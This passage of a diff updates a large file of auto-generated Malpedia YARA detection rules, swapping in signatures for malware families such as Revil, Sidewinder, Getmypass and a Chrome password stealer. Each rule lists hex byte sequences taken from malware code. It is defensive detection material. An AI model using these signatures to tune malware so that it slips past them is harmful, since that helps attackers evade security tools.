+		$sequence_0 = { 33c0 eb76 83bb9802000000 7504 33c0 eb69 }
+		$sequence_1 = { 33c0 eb05 1bc0 83d8ff 85c0 0f84a3020000 8d8424bc000000 }
+		$sequence_2 = { 0f95c1 33c0 898e80020000 8b97f0020000 8996a0020000 398704040000 0f95c0 }
+		$sequence_3 = { 83c8ff 8b4c2450 64890d00000000 59 5e 5b 8b4c2440 }
+		$sequence_4 = { 89870c030000 3bc3 0f854bfcffff 5b 5f 5e b81b000000 }
+		$sequence_5 = { 751f 5f c6860301000001 5e 5d b801000000 5b }
+		$sequence_6 = { 396c245c 7508 c744245c22a14400 396e0c 7428 }
+		$sequence_7 = { d1c6 83f905 72d9 8b4c2410 8b19 895c2410 85db }
+		$sequence_8 = { 50 e8???????? 83c408 85c0 0f85bc010000 8d4c247c 894c240c }
+		$sequence_9 = { 8be8 83c408 85ed 743d 45 6a3a 55 }
 
 	condition:
-		7 of them and filesize < 1416192
+		7 of them and filesize < 704512
 }
-rule MALPEDIA_Win_Oceansalt_Auto : FILE
+rule MALPEDIA_Win_Sidewinder_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "191b2018-8ac3-5133-a29f-db070c527bb4"
+		id = "392688fd-d092-5405-9184-eda077762341"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.oceansalt"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.oceansalt_auto.yar#L1-L171"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sidewinder"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sidewinder_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "618191320109f3ef06ff0a1fecf4d89247c2a03c9ed872381bb347fb4c387d8b"
+		logic_hash = "ed076ae71f5673b9d5b7573a79292b3a5ca9ffc23926551c4a3dd71dd3fac1f3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -84919,38 +85200,32 @@ rule MALPEDIA_Win_Oceansalt_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a00 6a02 8d8dc8fdffff 51 }
-		$sequence_1 = { ff15???????? 5d c3 8b5508 68???????? 52 }
-		$sequence_2 = { 0fb795f2fbffff 50 0fb785eefbffff 51 52 50 }
-		$sequence_3 = { 85c0 75ce 8b8dc4fdffff 8d85ccfdffff 50 }
-		$sequence_4 = { 6a04 50 8d55fc 52 }
-		$sequence_5 = { 668945f9 8845fb 6a07 8d45f4 50 56 }
-		$sequence_6 = { 6a04 53 ff15???????? 8bf8 85ff 743c }
-		$sequence_7 = { 6a01 ff15???????? 6aff 50 ff15???????? 6a00 6a02 }
-		$sequence_8 = { eb26 488d442420 488d4c2420 482bd8 660f1f840000000000 0fb601 48ffc1 }
-		$sequence_9 = { 85c0 7e3a 488b0d???????? 4c8d0df1140100 488d942400010000 41b800020000 }
-		$sequence_10 = { f644246010 740a c68424e002000000 eb1a }
-		$sequence_11 = { 0f8c96000000 3b1d???????? 0f838a000000 488bf3 4c8be3 49c1fc05 4c8d2d1a0d0100 }
-		$sequence_12 = { 48c1f805 4c8d0542720000 83e11f 486bc958 498b04c0 80640808fe eb07 }
-		$sequence_13 = { 48ffc3 48ffc0 884bff 84c9 }
-		$sequence_14 = { 488d4c2458 4889442458 ff15???????? 0fb7542454 0fb74c2450 }
-		$sequence_15 = { 7d1a 4863cf 8a84191d010000 42888401202e0100 ffc7 }
+		$sequence_0 = { e8???????? 50 e8???????? 8bd0 8d4de8 e8???????? 8d45c8 }
+		$sequence_1 = { 8d4dc4 e8???????? 8d45ac 89458c 8d458c 50 }
+		$sequence_2 = { 8d4dcc e8???????? 8d45dc 898570ffffff c78568ffffff08400000 8d8568ffffff 50 }
+		$sequence_3 = { 8965ec c745f0182c4000 c745f400000000 c745f800000000 6a01 e8???????? 8d45dc }
+		$sequence_4 = { ff75bc 8b45cc 8b00 ff75cc ff5060 dbe2 8945b4 }
+		$sequence_5 = { ff5004 8b4508 8b403c 0b450c 8b4d08 89413c 8b4508 }
+		$sequence_6 = { 0f8053010000 668945ec 668b45ec 663b45d8 0f8f22010000 668365e400 }
+		$sequence_7 = { 0f84df000000 66830d????????ff 8d45dc 50 8b45e8 8b00 ff75e8 }
+		$sequence_8 = { e8???????? 898530ffffff eb07 83a530ffffff00 6a00 8b8568ffffff 83e801 }
+		$sequence_9 = { e8???????? 68???????? 8d4ddc e8???????? 8d4dd8 e8???????? c3 }
 
 	condition:
-		7 of them and filesize < 212992
+		7 of them and filesize < 679936
 }
-rule MALPEDIA_Win_Victorygate_Auto : FILE
+rule MALPEDIA_Win_Getmypass_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "967fc783-d9bc-5b76-9b75-3a087d6a66b4"
+		id = "2ef24a38-2dcf-5e36-ba94-2bb1b309bc31"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.victorygate"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.victorygate_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.getmypass"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.getmypass_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "427b2d98b9c3c2aa99b815ff597c75e43d477300e8035fd3554b7df3486b4eb0"
+		logic_hash = "942b395c1b2d446c948aa0d6582010011bc502a4c907e5ca48324090ba079bd9"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -84964,32 +85239,32 @@ rule MALPEDIA_Win_Victorygate_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 009bb3410050 ba410050ba 41 0050ba 41 0050ba 41 }
-		$sequence_1 = { c745e800000000 c745ec0f000000 c645d800 e8???????? 57 51 8d45d8 }
-		$sequence_2 = { 745c 5f 5b c60000 33c0 5e }
-		$sequence_3 = { 85c0 740d 50 e8???????? 83c404 8bf8 eb21 }
-		$sequence_4 = { c1fa04 8bf2 c1ee1f 03f2 f7e9 c1fa04 8bc2 }
-		$sequence_5 = { 8b460c 8d7e0c 85c0 7556 8bce e8???????? 85c0 }
-		$sequence_6 = { 680c2b0000 68???????? 68???????? ff15???????? 8b0d???????? 6a00 6a02 }
-		$sequence_7 = { e8???????? 8d55f0 8bc8 e8???????? 8b45f0 c645fc01 8b55e8 }
-		$sequence_8 = { 8d86e0010000 6a36 50 ff15???????? 85c0 0f850b070000 ff75f8 }
-		$sequence_9 = { ff15???????? 85c0 0f852b010000 ff75f8 8d8688020000 6a5b 50 }
+		$sequence_0 = { 8d8de8f9ffff 51 8b95ecfbffff 52 e8???????? }
+		$sequence_1 = { 83c404 85c0 7502 eb0b 8b4dfc 83c101 }
+		$sequence_2 = { 7d34 8b5508 0395f0feffff 0fbe02 83e830 8985f4feffff 8b8df4feffff }
+		$sequence_3 = { 0f85b4020000 837d9819 0f86aa020000 c745a400000000 8b55e0 83ea01 }
+		$sequence_4 = { 0fb61411 33c2 8b4d14 034df0 }
+		$sequence_5 = { 8d4dfc 51 8b55f4 52 8b45f0 50 }
+		$sequence_6 = { 0f8428010000 8b5508 52 e8???????? 83c404 0fb6c0 }
+		$sequence_7 = { 6a00 ff15???????? eb14 8b45a0 50 }
+		$sequence_8 = { 7467 b9???????? e8???????? 8b4dfc 51 8b55f8 52 }
+		$sequence_9 = { 80c201 8b85f4feffff 889405f8feffff ebb4 c745fc00000000 }
 
 	condition:
-		7 of them and filesize < 1209344
+		7 of them and filesize < 49152
 }
-rule MALPEDIA_Win_Kivars_Auto : FILE
+rule MALPEDIA_Win_Chrgetpdsi_Stealer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d7f4c524-5721-516a-9cef-d2a6a4c9899f"
+		id = "12254ac4-43e6-5705-9880-6efd82324f77"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kivars"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.kivars_auto.yar#L1-L161"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chrgetpdsi_stealer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.chrgetpdsi_stealer_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "0b4c416b9816d7bbf517a345e2ad0668f53e6096c3605ae9037473d6b0f26452"
+		logic_hash = "f510ed1d9dd9ee7e68c40131d1a59b2b1ef7a35fe613361e1f3e48c7e065108c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -85003,38 +85278,32 @@ rule MALPEDIA_Win_Kivars_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b1d???????? 83c414 33f6 68e8030000 ffd7 }
-		$sequence_1 = { c68424fa160000eb c68424fb160000cb c68424fc16000074 c68424fd1600005a }
-		$sequence_2 = { 4863403c 488b4c2408 4803c8 488bc1 48890424 488b0424 }
-		$sequence_3 = { e9???????? 488d0d84c10000 ff15???????? 8b842454020000 }
-		$sequence_4 = { 742b 8b542414 8b442418 8bce 8d742430 8d3c10 }
-		$sequence_5 = { 2bc8 8bc1 89442438 488b442428 }
-		$sequence_6 = { 8bf0 83c609 33ff 6a74 897c2414 e8???????? }
-		$sequence_7 = { 56 8bf1 8b4650 c706???????? 85c0 }
-		$sequence_8 = { 8b4d14 51 e8???????? 83c40c 8945d8 8b55d8 52 }
-		$sequence_9 = { 51 896c2420 ffd0 8be8 }
-		$sequence_10 = { 88442437 c644243800 c644243900 ff15???????? }
-		$sequence_11 = { 4c8d0d08760000 4c8d0511770000 488d942440020000 488d8c2430010000 e8???????? 4889842450030000 }
-		$sequence_12 = { 488b0d???????? 8b4401fc 39842468100000 743b }
-		$sequence_13 = { 33c9 89442420 894c2410 89442424 }
-		$sequence_14 = { 7538 8b442420 488b8c2480010000 8b542430 }
-		$sequence_15 = { 488d8424a0010000 ba10000000 488bc8 e8???????? b801000000 488b8c24e8010000 }
+		$sequence_0 = { 4889ca 83e11f 4883f90c 0f8743030000 4c8d41fe 4983f804 0f869a010000 }
+		$sequence_1 = { eb11 488d7818 488b8c24580b0000 e8???????? 48c7400810000000 488d0de6c51a00 488908 }
+		$sequence_2 = { e8???????? 488d059bb42d00 bb03000000 0f1f440000 e8???????? 488b442450 e8???????? }
+		$sequence_3 = { be01000000 4c8d1557bd2300 41bb02000000 e8???????? 488b6c2458 4883c460 c3 }
+		$sequence_4 = { 4983fd2e 0f82e3060000 4c8d69d2 49f7dd 49c1fd3f 4183e52e 4901c5 }
+		$sequence_5 = { e8???????? 8400 488b9424d8000000 488b7270 440f11bc2498000000 440f11bc24a8000000 488d3db2020000 }
+		$sequence_6 = { 7476 440fb74b52 4d89c2 4b8d3c01 488d7ff8 8403 48833f00 }
+		$sequence_7 = { c3 488d05b0351c00 488d1dd9212400 e8???????? 90 4889442408 e8???????? }
+		$sequence_8 = { e8???????? 488d3d09643e00 488b442438 0f1f4000 e8???????? e8???????? 4889442430 }
+		$sequence_9 = { 833d????????00 7509 488905???????? eb0c 488d3dbeda3b00 e8???????? 488b0d???????? }
 
 	condition:
-		7 of them and filesize < 196608
+		7 of them and filesize < 10027008
 }
-rule MALPEDIA_Win_Rhadamanthys_Auto : FILE
+rule MALPEDIA_Win_Crosswalk_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a80a8ef9-ea3f-56c2-85d5-70398e8fed62"
+		id = "a1fb3b2b-1a2f-578d-9401-68574e21a388"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rhadamanthys_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.crosswalk"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.crosswalk_auto.yar#L1-L159"
 		license_url = "N/A"
-		logic_hash = "33afe88ed91c55c9115df6fb51e8b7670279afd4e605824b7c9b26fba3c0f08d"
+		logic_hash = "84206cda2a660daf3146c7ad3e0c02d63ad7f2eb5361ae4afeb3936cb61d00b4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -85048,32 +85317,38 @@ rule MALPEDIA_Win_Rhadamanthys_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33f0 33fa 891ccd28100803 8bde 892ccd2c100803 8bef }
-		$sequence_1 = { 33f0 891ccd30280803 892ccd34280803 33fa 8bde 8bef 0fa4f708 }
-		$sequence_2 = { 0facdf08 81e7ff000000 3304fd28400803 3314fd2c400803 c1e918 }
-		$sequence_3 = { c1e608 33f0 891ccd28280803 892ccd2c280803 33fa }
-		$sequence_4 = { 66837e082c 0f8692000000 6a04 6800100000 6800004000 }
-		$sequence_5 = { 03c6 50 8b03 034508 50 e8???????? }
-		$sequence_6 = { c784248c01000068ea0303 c7842490010000b4190403 c784249401000070490403 c784249801000018770403 c784249c01000058a20403 c78424a001000010d30403 c78424a401000034010503 }
-		$sequence_7 = { 837df400 0f84a0010000 8365e400 eb07 8b45e4 }
-		$sequence_8 = { 5e 5b c9 c20c00 8b4c2404 8a01 }
-		$sequence_9 = { c7842418020000383f0403 c784241c020000c46c0403 c7842420020000449a0403 c784242402000034ca0403 c7842428020000fcf90403 c784242c020000182b0503 }
+		$sequence_0 = { 410fbe00 49ffc0 d3ca 03d0 4183ef01 }
+		$sequence_1 = { 4c8bc6 33d2 410fbe00 49ffc0 }
+		$sequence_2 = { 41b88d56e68c 418bc0 f7e9 03d1 c1fa0b 8bc2 }
+		$sequence_3 = { 458d7ee0 418bd7 ff15???????? 4821742420 }
+		$sequence_4 = { 4883ec28 4885c9 7402 ffd1 }
+		$sequence_5 = { 458bc6 33d2 488bc8 e8???????? 4533c9 }
+		$sequence_6 = { ff15???????? 448bf0 4533c9 4533c0 }
+		$sequence_7 = { c1fa0b 8bc2 c1e81f 03d0 69c2890e0000 }
+		$sequence_8 = { ebc6 c745e0285b4100 e9???????? c745e0305b4100 e9???????? }
+		$sequence_9 = { 57 8db8948b4100 57 ff15???????? }
+		$sequence_10 = { 7313 8a87f4814100 08441619 42 0fb64101 }
+		$sequence_11 = { 8d8008824100 8945e4 803800 8bc8 }
+		$sequence_12 = { 0f8e6fffffff 83c8ff eb07 8b04cd743f4100 5f }
+		$sequence_13 = { 8b4508 dd00 ebc6 c745e0285b4100 }
+		$sequence_14 = { eb14 85db 7507 c74634f41a4100 57 ff7634 e8???????? }
+		$sequence_15 = { 83feff 0f8483000000 eb7d 8b1c9d00124100 6800080000 6a00 }
 
 	condition:
-		7 of them and filesize < 1111040
+		7 of them and filesize < 286720
 }
-rule MALPEDIA_Win_Nosu_Auto : FILE
+rule MALPEDIA_Win_Revil_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "fdc65506-7690-528c-80ea-bfae31870e43"
+		id = "45dad52d-586b-5209-8ce9-2a48da5b7435"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nosu"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nosu_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.revil"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.revil_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "63b3125b2fa7b440ce66614e4988544ad3a96e52c6fcd77e2718549a9b26e496"
+		logic_hash = "120e5cbd30d90d4dc063fdbdb97cb211c1d8a67c5a1d2649d0974884fd7ebfbf"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -85087,32 +85362,32 @@ rule MALPEDIA_Win_Nosu_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 56 c605????????01 ff15???????? ff35???????? ff15???????? }
-		$sequence_1 = { eb1e 8d4714 50 8d5710 8d4c2418 e8???????? 8bf0 }
-		$sequence_2 = { 8d87d8000000 50 e8???????? 8b542420 8d87480d0000 83c40c 8bcf }
-		$sequence_3 = { 55 50 57 55 6a00 6a00 8d8680000000 }
-		$sequence_4 = { 8bc8 8954243c e8???????? 83c120 83ef01 75f3 8d86f8030000 }
-		$sequence_5 = { 663902 74f8 52 51 8d85f8fbffff 50 ff15???????? }
-		$sequence_6 = { 744c 6800020000 ff74242c 8d442438 50 ff15???????? 8d442430 }
-		$sequence_7 = { c20400 53 8bda 8bd1 56 57 8b3a }
-		$sequence_8 = { 8d5508 6a02 894508 e8???????? 85c0 59 0f95c0 }
-		$sequence_9 = { 50 56 ff15???????? 8bd0 8bce e8???????? 59 }
+		$sequence_0 = { 7e09 80f92d 0f8509060000 6a03 8d45e0 50 8d45e8 }
+		$sequence_1 = { 59 8d8568ffffff 50 8d85d0feffff 8db5d0feffff 8dbd80feffff f3a5 }
+		$sequence_2 = { 83e801 eb07 b00a 5d c3 83e862 7428 }
+		$sequence_3 = { c1ca08 23d6 0bd0 8b4104 57 }
+		$sequence_4 = { 8975f0 8955f8 c745bc01000000 895db8 3b5de4 }
+		$sequence_5 = { 50 e8???????? 8b7d0c 8b4508 59 }
+		$sequence_6 = { 8975d8 0fb645ff 0bc8 8bc1 894dd8 }
+		$sequence_7 = { 334678 3386a0000000 8b4e04 334e2c 334e54 334e7c 338ea4000000 }
+		$sequence_8 = { 8bc2 318b80000000 8bcb 3345f4 3375f0 3355f4 }
+		$sequence_9 = { 55 8bec 837d0c20 7605 83c8ff }
 
 	condition:
-		7 of them and filesize < 513024
+		7 of them and filesize < 155794432
 }
-rule MALPEDIA_Win_Bistromath_Auto : FILE
+rule MALPEDIA_Win_Veiledsignal_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e2ace9ec-fb28-5f7e-b65b-e020bfa94a6f"
+		id = "6c1343f8-3e47-50b2-a300-f82013ec0933"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bistromath"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bistromath_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.veiledsignal"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.veiledsignal_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "8b0190b62dedacf36599f0042a8bd29edc86ceda9086cf91a756283776411b62"
+		logic_hash = "9a6f92fe1de553c3683182fb5ec18013c09f63a6458b1c64fe2148d2dc0fd4cc"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -85126,32 +85401,32 @@ rule MALPEDIA_Win_Bistromath_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 8bd8 85db 750a 8b45f8 c6400505 88580f }
-		$sequence_1 = { 8bcb e8???????? 8b8318020000 8a08 84c9 740b 80f93b }
-		$sequence_2 = { f30f7e44c748 660fd641f8 83ea01 75c0 8b7c2464 8b742470 eb07 }
-		$sequence_3 = { 8b4e04 85c9 740b 8b461c 8d0480 c64481ef08 8b45a8 }
-		$sequence_4 = { e8???????? 85c0 0f84fb010000 e9???????? 0fb645fe 3bf0 0f852a010000 }
-		$sequence_5 = { 8b97a0000000 8bcf e8???????? 8b879c000000 8b4df8 89b7a0000000 890c86 }
-		$sequence_6 = { ffd6 85c0 7407 bb01000000 eb18 a1???????? 85c0 }
-		$sequence_7 = { ff15???????? 85c0 0f8504ffffff ffb57cf5ffff ff15???????? 8b4df8 5f }
-		$sequence_8 = { e9???????? 55 8bec 83ec08 56 8b713c 8b06 }
-		$sequence_9 = { c7421000000000 e8???????? 85f6 746d 83bb0002000000 7435 3bb30c010000 }
+		$sequence_0 = { 8bcf e8???????? 488bd7 4c8d05e3270400 83e23f }
+		$sequence_1 = { 4863c9 488d15a8360400 488bc1 83e13f }
+		$sequence_2 = { 4d8be1 498be8 4c8bea 4b8b8cfef0e50400 4c8b15???????? }
+		$sequence_3 = { 4c8d05eeab0000 488bf9 488d15ecab0000 b904000000 e8???????? }
+		$sequence_4 = { 418bc6 4d8d4d10 4c8d3d3c680400 41be04000000 4c8d1c40 }
+		$sequence_5 = { 81f95a290000 752b 488d0df8030000 b801000000 48890d???????? }
+		$sequence_6 = { 4c8bd1 b82a000000 0f05 c3 4c8bd1 b80f000000 }
+		$sequence_7 = { 7509 488d055f820400 eb04 4883c024 8938 e8???????? }
+		$sequence_8 = { 7513 488d15ad940000 488d0d86940000 e8???????? }
+		$sequence_9 = { 428844f13e 4b8b84e010e70400 42804cf03d04 38558f e9???????? ff15???????? 894597 }
 
 	condition:
-		7 of them and filesize < 33816576
+		7 of them and filesize < 667648
 }
-rule MALPEDIA_Win_Lpeclient_Auto : FILE
+rule MALPEDIA_Win_Collectorgoomba_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6292aca0-d7ac-5cd7-a6d4-3438fdd1076c"
+		id = "5bb538af-60a7-5a3c-af65-3701cf208563"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lpeclient"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lpeclient_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.collectorgoomba"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.collectorgoomba_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "fa5662e58821dbe4e01d6876bcd73f389c9fb3b6d70b4d7afea75bf844e373c6"
+		logic_hash = "ad69a85577b2886d7cccd50f51e68db7322b59aae6c81464fad54090e92dc915"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -85165,32 +85440,32 @@ rule MALPEDIA_Win_Lpeclient_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33d2 897590 e8???????? 488d8dc2000000 33d2 }
-		$sequence_1 = { 33d2 41b808040000 e8???????? 488bcf ff15???????? 488bce ff15???????? }
-		$sequence_2 = { 488d0df74e0100 ff15???????? 488d0d9a480100 ff15???????? }
-		$sequence_3 = { ff15???????? 488d4de0 33d2 41b808040000 488bd8 e8???????? 488d4de0 }
-		$sequence_4 = { ff15???????? 488d9500040000 488bc8 ff15???????? 488d4de0 33d2 }
-		$sequence_5 = { 4885c0 753b 488d4dd0 488d45d0 488b15???????? 482bd0 666666660f1f840000000000 }
-		$sequence_6 = { c7451072007500 c7451473005000 c7451872006f00 c7451c64007500 c7452063007400 66894524 }
-		$sequence_7 = { c7451c64007500 c7452063007400 66894524 c745b872006f00 c745bc6f007400 c745c05c005300 c745c465006300 }
-		$sequence_8 = { 85c0 74dc 4c8d85a0070000 488d1504f70000 }
-		$sequence_9 = { 85c0 0f8e87140000 48895c2470 48896c2450 4d8d6208 4c89742438 4c8d5702 }
+		$sequence_0 = { ff7508 e8???????? 59 59 8845ff 8d4df4 e8???????? }
+		$sequence_1 = { ff55d8 83c40c 8b4508 0fb700 25ff000000 8845fd 8b450c }
+		$sequence_2 = { ff55b0 83c40c 8b4508 8b4008 c1e810 25ff000000 8845f8 }
+		$sequence_3 = { 8d8528ffffff 50 e8???????? 83c410 8bf0 8dbd48ffffff a5 }
+		$sequence_4 = { ff7510 8d4de0 e8???????? 8365fc00 eb09 8b45f0 83c018 }
+		$sequence_5 = { c705????????01020303 c705????????0104040e 833d????????00 740a c705????????0b060a0f c705????????08060301 c705????????040f0608 }
+		$sequence_6 = { 8b4508 0fb7401c 83c860 8b4d08 6689411c 8b4508 8b4dec }
+		$sequence_7 = { c705????????050f0f07 c705????????0c07090d c705????????0b010d0f 833d????????00 740a c705????????090c0001 c705????????0f0d050a }
+		$sequence_8 = { ff75fc 8d45f0 50 e8???????? 83c41c 688e4379a6 6a11 }
+		$sequence_9 = { ff7040 e8???????? 83c410 8945f8 837df800 7405 e9???????? }
 
 	condition:
-		7 of them and filesize < 289792
+		7 of them and filesize < 1400832
 }
-rule MALPEDIA_Win_Manjusaka_Auto : FILE
+rule MALPEDIA_Win_Stabuniq_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e3ef2c8a-601e-5fad-bcaf-45a15d46a182"
+		id = "aceb592e-d7b5-5f4a-8a9e-1d7eba65be7f"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.manjusaka"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.manjusaka_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stabuniq"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.stabuniq_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "b609fc5a0f646080989595e70a17261ca84aa420275082a0a377fc146648363a"
+		logic_hash = "8abe8b1e5433d79ecca06d79534ec6148ee9460e9d28a8041508dc1cd6d954c1"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -85204,32 +85479,32 @@ rule MALPEDIA_Win_Manjusaka_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b460c f7d0 2346f0 0b4608 8946f0 e9???????? 48897ef0 }
-		$sequence_1 = { 894c2420 458bc6 498bcf 8945ef ba4d000000 e8???????? 8b7d7f }
-		$sequence_2 = { b909000000 f348a5 498b8548020000 48898348020000 410f108518020000 410f108d28020000 410f109538020000 }
-		$sequence_3 = { 7f19 488b4608 6646391c60 7c0e 66412bd7 66015316 0fb77b16 }
-		$sequence_4 = { 4c8b7910 488bcb 4c8b6a18 48895c2478 e8???????? ff4f44 448bc0 }
-		$sequence_5 = { 834e0420 41834e2840 397b30 7509 488b03 40387861 7405 }
-		$sequence_6 = { eb07 488d3dd6030b00 488d1564270b00 488bcf e8???????? 85c0 488d155f270b00 }
-		$sequence_7 = { e8???????? 0f1005???????? 0f1100 0f1005???????? 0f114010 0fb70d???????? 66894820 }
-		$sequence_8 = { e9???????? 660f74d1 660fd7fa 85ff 7510 4c01c3 4883c310 }
-		$sequence_9 = { e9???????? 6641baaecc e9???????? 6641bafefe e9???????? 6641bafffe e9???????? }
+		$sequence_0 = { 8b4510 8a4de0 8808 8b5510 83c201 }
+		$sequence_1 = { 8d95e4fcffff 52 8b4510 ff5030 6804010000 6a00 8d8dfcfeffff }
+		$sequence_2 = { 8b4510 50 8b4d08 ff5124 8945f4 6aff }
+		$sequence_3 = { ff92bc000000 6a00 6a00 6a25 8d85c0feffff 50 8b4d14 }
+		$sequence_4 = { 6a00 6a00 6a25 8d85c0feffff 50 8b4d14 81c1e8110000 }
+		$sequence_5 = { 69d2ff000000 8b4508 8d8c101f090000 51 8d95f8feffff }
+		$sequence_6 = { 8d8dc0fcffff 51 e8???????? 8b5508 83c220 895508 68ff000000 }
+		$sequence_7 = { 8b8d24fdffff 51 8b5510 ff520c 6a40 }
+		$sequence_8 = { 8b88f0010000 51 8b5510 ff92b8000000 }
+		$sequence_9 = { ff9098010000 8b4d20 83790800 7513 8b5520 }
 
 	condition:
-		7 of them and filesize < 4772864
+		7 of them and filesize < 57344
 }
-rule MALPEDIA_Win_Sdbbot_Auto : FILE
+rule MALPEDIA_Win_Gcleaner_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b16da93b-bcb6-5a59-8ee7-f2b1db92f76a"
+		id = "f3bfcb33-d9d5-58c8-b732-fae47caf5ec8"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sdbbot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sdbbot_auto.yar#L1-L174"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gcleaner"
